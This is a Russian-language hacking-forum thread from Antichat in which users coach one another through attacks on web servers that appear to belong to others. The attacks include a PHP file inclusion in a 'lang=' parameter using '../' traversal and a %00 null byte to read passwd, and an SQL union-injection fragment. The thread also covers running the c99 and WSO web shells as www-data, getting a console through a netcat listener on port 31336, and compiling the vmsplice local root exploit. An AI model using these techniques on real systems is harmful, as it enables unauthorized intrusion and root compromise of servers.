ANTICHAT — форум по информационной безопасности, OSINT и технологиям

понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):

https://forum.antichat.ru/thread98525.html
Если того что тема прикреплена уже мало, мб начать красить названия тем в цвета радуги и что бы их названия как баннеры на половину браузера вылезали?

__________________
..

L I G A
скобку забыл

') union select lalala /*

Скажите в чём причина,никак не компилируются Файлы не серве с вебшелом c99madshell!?
Gcc есть
uname -a:
Software: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-3 with Suhosin-Patch

uname -a: Linux yesclub 2.6.18-6-686 #1 SMP Sun Feb 10 22:11:31 UTC 2008 i686

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Safe-mode: OFF (not secure)
И подскажите рабочий эксплойт под это систему.
И ещё при конекте через Puty на бинд порт все строки сдвигаются,комынды не выполняются,всегда пишет comand not found,что бы не писал.

Возможно, этот прокатит - vmsplice Local Root Exploit

Его то я и пытаюсь собрать
gcc -o expl expl.c
ничего не выводит,вообще ничего не компилит... =(

2p.r0phe.t
Залей шелл WSO.
Там есть ф-я бинд порт.
У себя поставь NetCat, и вбей команду(у себя) nc -l -p 31336
В шелле вбивай свой ip и жми bind (выбирай перловый бинд).
Смотри в свойю cmd, увидишь консоль сервака.
И там уже компели.

Спс,гляну.

Нету дебиана под рукой,ставить ломы =)
А чё по вебу нельзя gcc юзать?

p.r0phe.t
а ты де нить попробуй собрать експлоит а потом загрузить